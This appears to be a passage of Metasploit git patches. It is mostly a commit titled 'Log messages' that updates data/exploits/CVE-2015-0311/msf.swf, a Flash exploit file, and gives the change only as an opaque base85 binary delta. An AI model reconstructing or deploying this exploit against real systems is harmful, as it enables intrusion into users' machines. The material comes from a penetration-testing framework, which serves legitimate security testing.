z`D`TIB60kkY^s2Txxa4-Uf&BCvJx=DIKngbz;AvN`=s?#>4_Uyid%B7*}gJE>WFn4
z3F2~8o5dnry_TkMV8}&nf6F;zGBkZU`{U^2*`56<X)@+d$_A&9w6$<2;K6tyf0tQ~
zF`t*}lK<|MIXL59;LHFy<-!EJnfhkJ6@At%Wc_ccc0NuU00@}AJOT6UgWM4IH&}xH
zmwd9zdL;yJgS(vjyCC$Gh}mSMF7C~Ma3C~d-LJrMC3I-x^H1K8e@fiqBmp(zp%S9_
zI4XOPVW06We)bf$2XB72b>k9X%Alk?suZx*kGoAsJF`{&8<Oq+{W@+>w@`x~xHiff
zrxAgBKqX9opv={dc#wsrznk@fX<6HY=7Q0zH@Dn<x8DUIO`V=tIGhL^BY=l$Ftkr_
zDrAwiD01_c>(pL<f6z5IG2*zw<$@c%5pn!KqdFY=eW)0Q!NKN<Ol##$C)8^Kcc3zi
z_E@sppB=?_a4ceAjkX#X3cv@+4}1p$VWLIZp(>?`P%80Y9q*3B-PNMGeE(=bb{ZQ=
zIsxEZnndaH6zL`#hNFxNm9fiSd0v_=BMxA*@UjR!Sc?y^f8fo=S+v2Fz;AMHu5S4+
zGh4ee64l|>I#@wwDY?gkY4RxI)v|*4WBg!L;EZQW=^y;Lqq}pZ*|Tx7uPt)h6+e|B
z=#;ZnX(jp%Kt?1@(_Mo-dDGXUd%buP{|WZDX*otRir-qYw`IAtM(FpfTqIlxs!Z6Z
z2yD_R^t6>le|VdYsZIicmquu_Xi{=;IblDI0%BqDZSlIz-|ez3WYJm6{Fa2ciIvv1
zdA@6o8DAdi#*?gpNJ#1yFfeF2eS}*hu_hp7>`)T^*+pXwgu1+N$B_2^4)!QIa<;8r
z4cl{yp`_z9@)I1fGaH}pL&6?$32DXtFB|=Q4iZ`!e^a`0#2+=$yog67mDncGr(<{9
zI<}6WG#2OCZ^Rh9+rF8kAnUk5B>4740Kz%ZO-3n#CKrjV-0&uq7AP%JX69VdLoJt+
z;bVXcAcVspVg#$Pb1q~8C9sr=O1<O!%3L8HmO1p>%D6V<bu7+A)h3RV*-c^_-!RT8
zlSoN}S8AI%TPA&+z1ES`k}Z|-E!C*=JHN`e7((**I&*%)-=2vKY&tPIk(P=y{|fBb
rsDI^aYnC6oz?+fX>btXuou#M{UZYYFJCl<2wiiYLkWoMX{>Bp@xsq6E


From 15533fabe6f732e230de657d2697b33dc34c31e8 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 26 May 2015 14:08:24 -0500
Subject: [PATCH 0190/1013] Log messages

---
 data/exploits/CVE-2015-0311/msf.swf | Bin 20302 -> 20384 bytes
 1 file changed, 0 insertions(+), 0 deletions(-)

diff --git a/data/exploits/CVE-2015-0311/msf.swf b/data/exploits/CVE-2015-0311/msf.swf
index 0782407696358578179c54091bf480117265c06f..d4dfc9f9ffdba92fa1930c6bcb9ed531d0c059c7 100644
GIT binary patch
delta 20261
zcmV(#K;*y9o&lhr0SQ`HQylNf0057%2_*r45j5=fg)@zT&~r5UOK-|%r1bkR*@y@L
zHArinSEIx_`Oh=}^#@X&2Q@^_rXy@@QBoa_!MZ?hF)2&(Ick!3x2TLzuhB45TD;q-
z?|IV*aAxdB*PG0j$HQI%7!kk$G2Cp)Wac(kR%rBkA)~Rj*mB4YGgJc|{xd0|KubG+
z6;hx_`_XfDm|<dyp;21q4M^^DX3x}cOMrm*Xr}z;OJf}p`LksoQPoXQAGlr~N_gyj
zpMB*K9PQVAVYJSj45_TqOSB~&=6Zm}hTi(g<N`E#4Q()v%H?aoE7rc`d%%vvX0)FH
z7N`OQUS;*&;oHxVv<Yk4I2t$ByFWdD7^uBj5M2%-@r72v`v{r%wsWqW55=zB^##R|
zLV(x^@to6!Up2%w(F>Y;5xI33z<X*MN;9R@L5iUq^O{;b1gSQe%>yx>94c{#%O*Sa
zerKnJF8lmq6rMXbxchN>r>X#qgk|=#N4f6I=)asMC|E<LSD6Xi97g4oxgdyt7}{?I
z@-_pgt;ygco(6pe&Q#V6!9ycvP;aPTp&?7D!9mOd6W`VS)CE(Cg+z}EgZ8MJjif_b
zhCcHz%2XXLYLRBm?rZbl3GB<4xqju>X-3ZCC!`x5tneYkqL5tJ&I)%^Y+g+t@g>-k
zIgMD{Q6lpMDL74eh>3L+ydNTeCv7Krax*T4G07SXYW@0f?v=Tns2TfrBk{DO<Y3Ln
zPJXBdgcN6rC00)2Q{bcKB$*<*Kcm64DPP6!Ymd(0gqqrL$Q+>bsnG&)a&X6gy?^Kb
zq7BHI!E)~d9fFqKh+LcWB6Am>v__bqlXYg-vkA3nE%4+3LTs#BMSP!si_4>o-9kN|
zG1tzA#FEaeuoVvWeN@H8X8hEi40XseT<-ozv@b8oha9J?d)u8*Co`dkxsL@?!nQx=
z#}ujC3W#gVnLPWyAqOb2^_)pZ!tRdE!igVH@|gro8+(&?-yCqf4&-@4P_it@^LVre
z;LQK)EPl&-a$Dfrk^V`4O)APMEiG7(WkJTdp?!$m#s%3EyB9zA+GF_!;L9;DVhA_M
z@V9aX_98Hi+rQjio*1<bRiG#n%Fi0UgX1;~H@wFp)0(bgx}!h@0xnu9uNDLW-$G1<
z-UVI@+<qlqZaMs+pK(FGa^7l@gC4@(qN|upW6oqvr2wPal$pzal_%StTJ#&xAyE8(
zZ8!_}oR;C>G5`!;wtb^Js1gEx8+Kl}?y+GX5+J=L{yZ`i$9AgL3luLdqN6N#sXg+1
z>K0Rtd^Qz7@`y%+V!1h<7W>g(FWpLE){g+MkG%=oI%Cw2bTF$`_g3<^RdzOloS<W&
z$0X68FZn>{DW4#JaY|tw8?6?~;VV@*!I*}ar*w(mE_1*?qj5GkJCUGa97P&`OP?lU
zsx9p-gPwPjJ6?jf$(l%^;)hU$J;Bov{FSTPhSP%4FHF3@{jy|1JPwUH5*JgSU{N3R
zE85O0U5_ks<=9zbkyKu5s&hR_{09gv{!SuoG0~;AAtTLya_ORgf$(*c1cfl4ijD|5
zc;K!FcV{Yr+r-Xmq<z10L&ywEDh5RclnO%aeaS<}zryA%xMd=*ml=OK>)EWkY;~9S
z94ZOV7lEat*+7Ph6u!f;f~!{4I=3u6y;-}mM3jYuN2($GqJUTHce!ZlGSKuiofKkc
z(X8dCOUToIhe7t4&J(X^R@#C%Foo(b+)A-oA6zartNRJ&x_Pz1DbxqtQHuT3u~&&{
zTCq_F9x;L$p@r^T`#kmgsNovK!3fx2fwdO6-&+iy?x|D10^NJ0I+;Ds4T4B~8~3Y*
zUQbP8QL9xRaO%F!<6bZ=swPM>BozPXAfmZ$Id8Rp{{M?Q1oT7*Yn(0R8k3S|A`U%B
zjv`>Mc&->GRic2%%jjRe3G$8ntDq5hp4kQe=$}_mGUNEX7Z+na)TU>d=a(!E-=!9J
z><av{{?gf9a|$^v%gQu_<7_>>W;wdQ^Pgr1g1fRH-wCdOj$oXeH9dXh<cFo8Mr977
zTuHfq&1iPA%E0?qIuqe-kfPc(ih1mMwzqx8r3$UR^G^BAbV}?N)l<*M_D?#EQ@<iU
z{5s;Av7<H%7H<|@!D*-`d~zz71d&V%H`NlN&dA8QngSUi2Slf$MyU%^zNL(i6y=zp
z&<D}LbJ_E0mSV$@xE7i>?I8~=uc#6!|G1EU#akVptDcdq#tApOg^)cym|4XMvz~f|
zDK7V)+P*lS%U>FWxwc~kjy5+2-oRBGV~6PMA`2)(>I&%G|6-_`5#-J2*<CsdH@Ey_
zNs)p>e3N_6sNq;lHx3F^2UE%_^U%%;xm_=~Dx)Tq)7Im-J<j49W7|;-DS>Bfw_jO*
zLbZrj-f;hdaJwQiyuWBg1HTQNPZyC#SmCO<BL?va@4DtdbU4suNth;b=q#^K`lo<A
zd<3ldX1~zTAKR$v6%J`E&Th~(i@S0`wJmBDLu^PX<`^{Yq=irzb3|)sC0SG$e1kHO
z$i1>*4H+qo4l!Z8CGvQXGXJWUN35%V_xT`xW;|#WBV3=Bs{)sjSBOk9c{iIG)*5Of
zY_sWJ%v(h?X}oL!onSLU-_a<#ET)YYiuVXmsphHVE#T>V%zES3_&Xa>O-;6|iM29E
z!iIm}TU#@!_q6c_f|{qQi-YuH=MyfZh%~qjRrg%2I3e#*;EL|&Mn7Qq&rqU&w={TP
zG{)kmOpoq+NS(D03yy6A7d}%IW_9=BCyCNz2=ojzZ$58Ew+p)F!K$fzM+l9Ed}wUJ
zDtme&_w9!NhFW?55On)edx-3;gRaj9w*1vG2g@su6@*0{1S>Py>?}CWE%VECqyCZf
zvw-&(V<TFEZSaEy0?gN$$d=H549p$*2lHNiwpB~ZR*rss4lh>^WWE%Pf(W`6ucCi`
zu^C-Tzqcl(66B+EX_LM!Rp?lGQ{)I3arT-^-yjcd;;KYN?IXdt2Mk8?%UYBxbO#;8
zRmQ#7J9(8A{A-w4)Z<)wF^=`|O6#<%b12V@+urkd1h7=5g)F7WzJtJj#Kvs0{A2Jn
z=u`IlTgh|f&$#B8dqjXWU2oeA)*kf7hxA<Z!oK*Rn7$thI1xlrnVatv6zrs$3#_9s
zY7;b%QkA9TQZHQOp~0jz_6Uj4Y*%#LN6$0&u~9q=6Bu*djm01<w8La@1N6GY#eSSr
z8T9cdj6HhFu#uz+nx7<pb81g@5f1gP;!(sB0o)<II(^WLtb2WT!zDk7ByZx|nmMwX
zX#kH&1uDjP5Y57nunXxclg)Wy9e6w3V%XVMHM#pSz7{l<a1`9$Lb{zu=u#AQ%R}fD
zHvI2v4PlA46&hq=9F==2WmfyK=)V|EBS5Kjmcc5Zz;I7aI6PK=WWoL&AF!iQm3&6%
zcwM|T?y3)({6(=QR7{%7pLt6JRV)`8gm}_Gv9U3wwgNSK;k?(S;!iNxvQl+^#saih
z7>M*|kIasR2BvHZU*{>qooU5C*X&CAs*y;WGGl&)*&1Wb<sR~BmK?^n5!ahkK&*j*
zX%?4P1ui?wp*hxn%V2oJH7|{87o97WMg=dXUySHjrS@P8i${SMUf#zTcrog8*#gi@
z<F-Br2ji6_z=h(HNBTDD#ZS;E?VlCh5e#RsBPOd;6Qg!Dq^RvxlsKcehEu1t&8>Le
zP<Qj-%8{>!*`Gwm_M_6-%tkJd!id@vaYwEAJ^u}%P`pWhwJybqR0Y5^ccPWfHMzLu
zxi}w)^T1(@onyR+4|v6d5g}3d@ZGOe&_Ed<!mQs~o>>&=v|ThSp<tk@z}A~;<_^Co
z-Hb($9I88?H!T;#$kx0Q2{;&z(`Bjg{uOHMGCP9X90;{hU~DAdtw^if=vizU;U6&B
zCW5dsrG|=sPgZYpW>+(O_Kt)k-=^!K^{$#XXqH6ztDM}(%kaRx)Vwll_fALbB_Im4
zZm!MY&+^F3+N|9nm3h#^jcFmoPOnG9E_t4(mw-@?k4;zzCcR12un=kAW-&>NrB2hO
zY6kk-(eYe?&vEDxkR2O2K1XYX)t^6{{T6DR;VFK9J%Oa`EYCRXXN@afja`m7l&Nc{
zIf{X}|7-=4SJ1EXl2(*031|6UuKSV%9`p%2_vN|8302QrcaR5r8dm?aXrjnOvvUGg
z$)?+|xOi4Rd8;m67bnDGP<9n~J9Z)v{rM2N-JG<9iinBvo-^-4F_9Kts`~CRX-N?;
zmEPHZ7)u+BQ94zUWizX>R;M6(x7$hk)9&o3)x5>HWow-i4@-SS{WS2j4gD=LqP}_Q
zFRsE_KVy&(nN0a8R~?VCX0#c!^?Tywx*tDJ5yqGyI)BCFhJeahVx<oWtw~u4Hcyi`
zpkxBJ@l$z!hUlwxTijUyN<0SFJMb=4%}S_${h+#PQIZ8q#nXY9)o|*h>_tL56ts&~
z9B#N%M{<v7tz;krj$6P^_vo{jDNUt&smz1nA5xoB(uC4#Hn`cqanvK}OU<)q8gU^%
z=mLM|v3sP(QRJ)PJ04Wtw&&$sUgHm-^e5T<7nv&9$kQrrT0F=|odX&}%TE8pUv8*>
z6Prn;eb?())}#J8e#xr+sat9GPib`(W7ICP{eW#k;!AiT41YQef9-lkfP#JdAlcLd
z6mQB-9T6hGB9?j^YPmvhob=7nyzX;yU*?T!2}Nc@&*c&S4+9^F>dz36DQ2?YX^8Fv
z({ACKhDm!(R!NN4X(I0v-zfvhSLNA%Ue9fwDO-3lF33B2A<S=N1*u|mVjdzidYcCt
z_*BO>BUE%fD*c{IQtrRLDB8F-%-rAyk7!GO^#AKu4W$fM(wzr{vGhiSMKEy(r7gI=
zz^qSDdJ7F+g4$Y+>iGngw2WadvfsTe6`E0Gdb0OKEekqs`JowF0~qks&+9FJ>Hf=J
z16nLPk&Ep&Y$}3}9tr7DkkUtIldn2w*M)7!;PL&aDbUz6QGgBQ4?j2MRLaj>dP>=3
z#JHeA19R;MJtmRHy6Gip1ytfCG|JEwG7I5urko1=vF8o}eDRB-brv9EJ4nU;p+qU!
zAHBg=e|sZEE>v!iv=3nVM86t;qy5UZYh#((H;i(#G{AS*|0e9bETCbSJPLj(;$mEQ
zOJ!y<JRy1*0rz|-II3=I+5*-wHy{&Xlj{R_l>|-US-_EuPWwP$9QRFbTRGc0^Eck=
zNlu*VADnc&5+71q)ob{zG59<s6h>S7+*{t&k{Y{RBmO%JMQpkj>&q&C7S`GG%Ubxy
z9TaK;Q*=wxtzUI4otxu7|9$574B3}%GVxBDtht+W-k+nlGpT)iGfsAGz8`&2U%f9(
zb}r%u2%s3Fos-O_D*rFjGDyKSQJLG7{`0{No^mY8>prEt-xny#*B4C{?^0_8l5+z(
z(wQfR35EcCyYP+MinXqPXWm@>T|Qe)V2>+>*qbf}Vy}Qd0pCi24_bpOM*_}XxO{NA
z{;N%ib}F&Mxi%OhJEJtpRA!#n_rAhu6jP84YJ-Zim!6%W$7+2h!l;-(x|8AvTwQW~
z#<8d(2t1vvFtsJQgAHyHmPwM??78eGWs{|TD$^PBKh7rXoK{MI1Jb(3DYrE_r8~|k
ziX};Ebdbx!xK(i;OH4!~<sI#j2<Ozcg9H5lPh=o@Fu-zHoTa_gx%>#+Gxhj07scC(
zv?@i&@x<3<AQAwn+J5Dz@{y8%EQ45Zl3rDKlrwoF{ccajluo<kXgfY6BtnEN!q9Aw
zEus6u#!CM6Cq<!u;lV<$;8h`8ciSaKo(3tY&A@di9z<V+idRM|8YBs+FiZTQ89UDD
zMNWMoeIwJ*`eUSsU;hQ|u#*GY2M`P8EQ&a>flcRzUMTq*qTA3YvQ=d*&Wkc4Vk$O|
zGuN?`6bS5mGcUa$<JUEiZ6CILC3g1=o%?_bNRV^)Zfk>ofs5$aX6nvWiN|Rc4VzVv
zRX-TQjt$Ggtz=&fCoOMwLq4fTCPA>f*OyM1JOu%L_q0R4w9!TCaB_rh)05e*Uhrfy
z3z9^o*lh#}3&IFl3nJO!Rk#&R1iExsCYbQ*$x0$U{63)YR^$%GA$*ePYhmZmO9|^Z
z2q2VqMb1EfE6(tNjpDdbdK@wnFSs%kS{!Cr+)<dD<S$>3%M367CUQ}K3y~;U?H(&m
zq&tBEtO^S>;tX=pDND&4z_0*HbN^OUG+KxVwfU1bij?#`hxh6&1ZSVGZ(lWwoN%CY
z2P9lFbH7>}xIHM8A{#3Cjw<(3dUB<4GFefA=XTbA=EGzpDvEj#w2}2&C{-4wS;JKp
z<|9aClT+0=Tm)D4Eq?O2C*N=(TD-f_(cT-Zuf6wS0JbwlBpE7J-AzXbpufRo;BcG8
z_hOuCHAG#768QNrxQZ%K{`~tP^z%ts@KoK@jhH?fTVjS${32_G3{HLT{XD=%nAlDJ
zGpL_`N{RAVA!I6xO!A3-b!FpYJDQ|S$_L(kj7jySp~9X#z!|w>TNAZ!`<2ixre8v3
zYp{Klv7S8hs`5kA>;%WzFf3$m60%)`+*0`X?Af7o56&Y^KD0#HZ^3zfYx}~K=p;aV
z1W=L#zM|^FUZ>=&WLziOds`Q`9veu0bpa=T+wQP|3re7oT=pMx><h{jFOoraYPq<g
z=axZez?&U)=X%HrHEt%0RKv9=QL7$U`SjOKvx6uCIBWlG@&DoFrD*0|5Ti49_yptj
zNsNCRRYhXpTSoWVOPkc+dB;ge#UWa~EB4wm33FHep*HNi-&65#`!W*k@D}$tf=qdT
zXe1CmM-0>gaMZr*`BtX}F5&ky#f6T)0}i{^WFsWB?&)Y;B%0Sd8G&HD;6m5nycvGm
zA;1?naw;VNuJ6^7Hw|hu232a#04Fs(C>Tj6UUk99+e*A?DF@#cPYEGSO*{ekWA9hL
z|AvCCu^MA#wT(&ImIKK3=b?Pv%6Kq;|L&q-qvMkTqdkfVb@3aRi;q!fxkTKs!ozEq
zK(c-&5xu76Awc*<ojq+H{K$cHe?Y+cf$tNDbzNmSgJENDt)MRxWYzbNh$l`D;mrq-
zyN<P?H_d+jXYjKR$0ID_)2@h)`se*Q6<kx+DjGq9ncF7hW(!{~8CMu|DvW1;d*Je+
zB!%ik%yjDq*9Op;B2dv(L61G9c+TO-<&pbxqY2-cEyiImunqLALR!+jD*yPPD&kL4
z?71INqij&A;t8F;*ICY#fvk3Sdd-i@*!0OY&><{0<Ix154u}6-^!({~V8d;JvxV6M
z<JyaKy-pFG+$xS7s8>(W8(A%XniY1F=-2_*@`aqUsoc<Dgehk=ak;vm{0EYCJBUQQ
znnebJ>lbR4;F89}>5^YJU$W$E+Rg0y#Szt4CQlxean%<)Q(rL>^RIHX-OBov`-o{#
z`a98N$#6hunT|`qsmAK(0&4_spd8C)1|32L>YE8Bft)}1OCh9%dT8o@PrQ**w&vfH
zS!8ptMK?(kbBtJ-qNG)x(*OIoHr&sVrFLhrAimy!?=h~F+hiu=#-3Qd06aRe43C5+
z#(cvm1YsS-0elvKbmgodGwgaU82vU_^{v*UTm*7*)k^Mj+GsV8uvE5JiQv{5$a%*P
zzVBHU+5#N&X9ibXW^I0d)~~b-4s?TB3#f#LmlOc^E3B{yvHhI~>3kjMOHI1s+h84a
z!m=QczT(CxV|77-=By8s&V*;R!Ztwo{m;StMJrz)wu<cyH-aMLD5BKrqvoeP6{>Wu
z#`~pY!jjN(HUv?H9Uew?9LPoqQD4e4N6IAzp_X8Yfkwu$L!<<Md{?_FhzjUbcWwIb
z>%wp3r_q!k@ZD<A(AP#X3E#<dqco9HEXk;5Tr&5%p5`OcCnhG<gvIMB;P6f1pX<q*
zkdJ8JB2?s<8%YfxF3h#$*g4|c<a*5F=1g7e2<GVM?dyjpg^OSEU+6x|-T)8DgeaaY
z;NTroG%*a&P+8J{CHr<fw?~!!Mjr5{*wM7511a1d@;20WES?qgcvRtCv7?nXPiTNC
z6xZI1OsSl}H)i^}fC=xvj}yhp4&Ks$2+tmh8tnz7(p_irV>Z2YWiTBA*}SJ>Lky&S
zb24Z>Dx8xbq$_`}vo;E3HUq;Q>b%FtcaG>R8(L=`2*)jd`A^wLQk+%R`g#6PiFX3X
zR`B`9EyikxF4!Neu-#kCHuudYB^uc`yqYCrdhd`r*f{SQKu)pX9?OLTX&@G;+GT6q
z^<=)0Tz26*NJMb}F;5cml99!8(w&q&Dk6aIq+Bi*#ibq<@AgOZi1$KMR<u&-BB?Zu
zHd4?N7doGRVK+T;56B`Uyi6KS1+YZc4k#G~^C_1^z&j9t{*0QEe;`hD;quB>KSt=~
z9Vw!~Jf+RlbP@~sGVFFReZ4yjWs2-QeP1Jmw4y6gOq0YGEuhhg0tMIC&2Dd>X53Uk
z5TX5qb9KpfI_?a@3Jcn6)jv$f%`~8m4d<>@$T_%wgryeIzIg45_r*NQuelFmYR%D-
zTo=?nW8&27_S6hRuC{W)ptP-ktkN%v1i`**K}L*|iAV*>|H7*U_@EU?TzX|^0mGBa
zz<$qi=)ClEmyZWSuZ^E56COo}uzq@8+gJXK#VuT;LP$cMm6xF-<hqs4LE}CTqHN~-
zHl~|@wH%R4qRdKta?eIYH|4FP-acUqOVEX?6wev3a=`SKj@NT|+Xi!=wu8AM5|~k*
z^Jv}~+U3>R;$)Nke2jw)_Q$x`U)B0{gwLbs2Y|XBcTWrc0;n96Dm=0*=78F<VB>#>
zm8P2Fh8<<~N|~|2k%{Yzolm#t#JsDE-p;^(0?K;nbT%@T#i0u)j5PzQPGNp6q+0Yv
z145s|7#({!OE29@Jdbhq#3Sc1mzBj@;?j3(Pkrdsj^f`S_R)H46uE(Jz`V*<Az3J6
zYjRh#a&KGgL{Zoa@#3l=Rp{Q<7s43|FEHv`hvqP4wE&;#0z-)FlQdqcFaAwnuJGi4
z61=Gr?)izyt&%a9_jj|$LVTI6V3?7Z6EBkuC~{X*7IYL83Um_;kch>B806$9e-ToW
zXem~u{Mq)ldxA0q%rqw$X@*{@8v3OG<chze90_?Y6i?;2U@WZLZ{w<ZqNoT{7tSD5
ziIZbciN&<aCs__!6&a#n_q8mIVBKzi+~AT-rY|feF%h&-;9}$$KS=o%&kxs5EK7i^
zCrD_q74(i}BZ`IqZ_O^9gXK@vsRB=k@uo3g<rLssMZjtQCpb;DNOTE;5zPghqszF5
z$H5SQzXVEdIRPN^ZMP@yvm2BLe~bhx!C4wEVWT!Zwg4KKt(&WEO@BqFgXf%oWIbs@
z_AzTnGw|@UL65dOqi%M^bT>c<U8UDv9NP;`3;DYP*$t-oa00{?9brvey6fk?9l->$
zcJ7W+G`6IIQ-@L}96JG|Jwj%o^Og(=TzdN196y~2%(>XWRKb746qnPNRx<e_lYH+>
zQ}O^$-TAQWl1lR<%A;HpN3RTjWr5Bbv$bDAtiXpK^C#B*yd~<NcpUP}Bg{t0ke`m%
z19S7>Q}6Z$Y*b!!kuKgZY`X$V(Hw&OP4Gi*x>N&~Y82IX3&kKSjXRy)>Zf=%mLP%n
z|40CrZGbQ@$fXg+(GSXoOVQRW06KZ;Lz>F95C%S1Sgr1TM_}yMe@3={aYmTzw;wUm
zF#Gn4vwx9(MKpOc6atRDgfZA2R}A!T$I0#-DH;FJ<-c)G?D04|bZU7o%04~|&$3y6
zvi!DdETg~hp@3^;mRia3y`DR$c!UYSOM`149uQFsecM6r4C52B?}d!hL`3fa#H*^R
zBW+1B9jyVvHc*allk2m8)P~%IJzt-FIYerT`A+w)VhRFP*Vtrh{wdh_lU7_h^JD3+
z$vI#!{VAsNz2)8Rp_HGKR~U5M5bcwd4EL(0agY(8lJBr1jy0>2Kv8?c6P>KP$CBB0
zt*$thNqgCwDJ_~$vgM9sbGpkiQ106oTVKw8j)taqX$#Z4BA<4D#U@>4JPuML(v!1x
zbo79I(5CPuQeFv|r}Dn^HSCTwo@k;s!Yl7xlA8|T0S9c1(c&L;Q|>WolGzJVnn?Ku
z>n!I~;Y2&19K~t=Mrr<XZdMa~Jk4umbbVB@ba9$&b|D`gtg<P!GLnaY5=@_Mq$HAB
zW_h5BNFd4G>MOK=cdsw=<1Gu!<QTF`B!Yb#zdfXJ<i%|rW!OE>k!<F=y6&(-0oK{+
z@Y&(VVIHB(pJ-ju)?8^CaH@3vmYGp!x3<ax>l|-0&QE~Y$u<&9<$BR3dq4yka4a3R
zVg^K)$_LICL(59Npu=;cAlUAWL`&PGQTO)LR*tz2V3crwv7C1Au}KaCh{L7(_h7RN
z@&8H2rSV4?CC#hFUdJ93rf3CcEedxls+&qJiYUV{<d$i=G;Y2G(?1ug7Vq6hmZLTw
ztfkNZuK1}G`qgUChMv?t4^z(fuy>7wlJzs_4i^qZ*gXiqF2kG=n(+AM!(gGLB2qll
zxH<MpJc@UJhHx|M7$(Pbq+sa0(eUgg)LEyVrGmqGZE-T~y5M&p9ZPSiamwPsg&jPU
zR$es&rY1(2k7iwZr5?WNcuxKkiw8$CcG-?#-sQ?O^k&Kbe!>`b=cFFqF)@h>Tq1dw
zBPEJ>vBBmF3q=!G<X+re-yVO@upDQ(KOq&3n#EFoGBoJPiXwhaQE;|AZ=Cp5zvU5*
zlin-ILI@Woy~1|PMaQI8;|F~u@gm}pSQN$S5zX_X7sAkzXiCC}q)a>jP~an@AFBD^
zTai1V>dcF3y;Y}mgkGGZ5BMi1N!Xj%JC{25%cZ<<JL!9yY^@-K`#n;`H=ekFQNc4h
zfKLB^l+w;*Nc|S9+f$QIOeP>g%5XT{+_AP$AP+<iN#~`+JX*5*p(7X>KlAm1lEda}
zv_<fO^Z3xyf^oh2Jainm(dPjuAl-qia#p*#z_!G>3;Iv%?YaD}5}xVn#ah-%koPjc
z7IxWcMnep0C@iq8u0|#=;x?Pf86{coO3=Z7Ifl!axpDyPcFgj6X~jlX<H=r<Vn8Ry
zo{a8-<x3I*>mI&a%p1<?k!Ix(8KS5~tQ4BKYe&F>6vC{&z1GHSfjTI39qm<b(i}%@
zLKgYvg`trh=1<9sxrdQHvp^K|pQ{0gJ@vZ;jNTa8T(=1-@9=o>TK@%;s>PJqJRF{X
z{+xPGKNHT3)Dxwb@W;ZL4R7)mC*UANK>IE0&TcLRo&de#&V2a6KVkV*;|;DJ+avFA
zkAv^67`>n2x{j;cV{rVj;OMc$1D!M#`G}hq5uuU(h$)+2*bK5+p>Ts9hkfz^fGhOy
zELKLp_nR2X5Q#N0uZL19N5q`MY@Q5%0a4J6D3B`_3kj2)KF3A@PT*-nM>dX!gEckd
z(hS0d2DvR8oAEq$R$}65V&Cpl45P5?e`Z~y4HNm&75S|}CfeTl2Yv>#$If|0rOY|l
zOJMv>nY?k9Q3i+CE67>!b0XQQN{|eq!cz0kkudCEg;SnNh`vK=_q+3Jl$6GQg9n?8
z(E+gYe7Kmsq)G;iAjxM@!|DIU?T6bJu|TsXZMrJ$E@r|*)$C7NyHomf*dm>}mJlHH
z)WYS`XbMVDiM&HyQ3Fduv!USE-a*^jw2&Ja622kMM%LGVV}BVk;spERc*AwuTXB66
z<oWvPi|4t`C#M&n>)bz>cH9wvgv`|`y{3viS7QL$f&LgXgsvwj1~%e)N`t<-TZ*AR
z9<^}I(9d|*+M(iK*U*gcj5p}gewR2L#I=gPDG0hdF$&i;uIHF|)CJmw9*7XR^#Pep
zm#lBRYuXYm<ewA`8+Re=I=>BS2EIxb7|uN|q2?#ut1joaavDkcwOj>%1<!ChPIwDq
zI~7{^FMpX`-zS__SUa7xaX`Zw<kfq~3jLz>+P0_rf`ADexCLSpSRyfa7I1hObAw)t
zdmm3>eAM-V$L&(oFp>c4KmG>Z_Bj7Q0_XC$N>~_BtK&3&y2$o4k~g;#E`VeX^=Jh<
zv8DbKu%}NyD)ab6FYZo%!I)Rv8?bhI>TPF_En_S0pWgSD9#tXdd`&vc9iJ>fdoKJK
zv4jQoyf7I-W74lC_Pz|pL)dWWin3aL-~)?B<ux{sZ`=z(f~caDBH-^ec!r*e+t&z{
zFM?nE+1~H(w#Y)sciGiAvbb>d9uKR;EswK4dcGMw>Y**D$k9Z9b(fidcyB3I1|dDM
zXcdvQM5G<-^)DKWL{<~og)~@LOPd8-#9b{Kir79?7WzKKwllx@ryz=q!wrLwR;H2i
zJ2s-`eyE%OLvOI;)?9vAKOVf_KzaEhU2Js~bb9H4lz(Umuop9VYo{S3I0@J<;9G~E
zyKiO>tMAV-mR4kc2Mxk~*5xqrxBf097@LDrJmHkx^X&(EDY`x5N3{W4Vw0vex(A|N
zlKYgY*E!0H&t>~d55?`MbY~yAPd2D4uFV=%9R8RYVQ$_v65Y`my^>?^Wbz;wvhDhc
zV;gc$X#w`t`R*D*zo8aYT(7S5JRga_acAAY>9((RLA5D=0p@pO6!Fo5^=YGm5+ib9
z=%kSIh>1-TUe}!4m2um%&Q^v-o40<lLq7#?s0MQLcN4;<zyHuj>>DdP$fy;q;W-RU
zZ-i}Q;oBan+_NT4gFrg(S*Nblps<?oCkHO8GDW|_DHoxgZd=43fu#|-QY>3WcQu@-
z%8(^^#XYQl2v`GE9<FZdveHHfqO5htH0?;uVDXEH;~-d^xe{LUM-<K!R20LhH-)`I
zv5tF3l1YK{Ty&8jEzdRSW82tNUQ7czi2#@c&Mniu*?V*<Zuk6-y#?g}syvhPe0fg0
z>hEZ5d46vZ=jaX!oj2(=%%@Bj(gM6Az?^@;GtI+)KJ!##;%jbz5N2gBU>2<APoI+x
z(mYm}6zgtVgY%k(R+xA9`AWL0#JMX+Eh2E05ZTr-bi46A){yJRZt)--j>@s=giF(H
zOr-=wU-=<eFjX&+^F{h%X1QY?h#C6<(KTW#QKosD^h}A_%elO$T=PQa$rBt85F8NY
zN$n<oga;0VucB*35_uaS*qmg{I!}a+=y_2cbmdmBVp5|I^%3IbLAeTx$X7ZyL>aU~
zRmlgZ8%$_QAC@S<=a}`|nU?hBp_RO1j3L{qD}}j+-begZGMB<>WwSn|4R0Ro$t*t>
zP9dAA#HtALFr7Vkxz&h(U;xcuq}d86>5}h%an~x6&#!yCFak^-CNRW=ud97TW>N^U
z7{-tv*hd-dOT2N~R~ygjv9C}5*}wm_B<%?oXf%dVTv{xT3MfT`CBmLCJ_GUCnmig?
zv4oEIc{-;36eR9qv%IQcMrb;+!LLQo#j9h^9RS97!e+9Mc7hI5rzR>ohT8m0&$w@Y
zUkrTTztwopqbzqMz_f`9L#w0tIrUEdj|}Vw*yrXYOtm}Ttp5J0p{;Y1r%zSv<K)}=
z1sL&jqPVOA%g`wzK5YE=1Y~B2#Fd>=aE$DDp<tneKI=O1>bsU>4E8?LrO&XWCsATQ
zdoK)xU4qVI_1cA8vu}_99z!=PpQa6egMlPD>|C^oJZP27RED=DRj_6FH>C<kOAIlJ
zl}K*trtVkhPEFR*`njgC7|p0+s6(=xcMex|QWPyG>uUo#7WA<o{`W4|IUVIP46&ik
zxf!zc;e@l)M5(C^MUuFYpW9@y?dvAGX9HySPTck!lAezo{KXV)WQ+j67wrvy47kN0
z<h<GK6B$x*-Lf*2fMxwaHlbfPesnJ*FWPI(U)PjjGsg!yVYqV>*0rwN4~H8Xq-BuF
zAgyAvs!90ArqW@1l%!K%jD1lB(=%FwGGXgoK4&4s6TZ2B)*tD0aqX1}A>Q+TKp3^E
ztiQsyL%8hXgc43X{gU=RR7n1Rgv^4c?vkzAK{CKD%3#$O((z59r-+3s#9mnyBF;8h
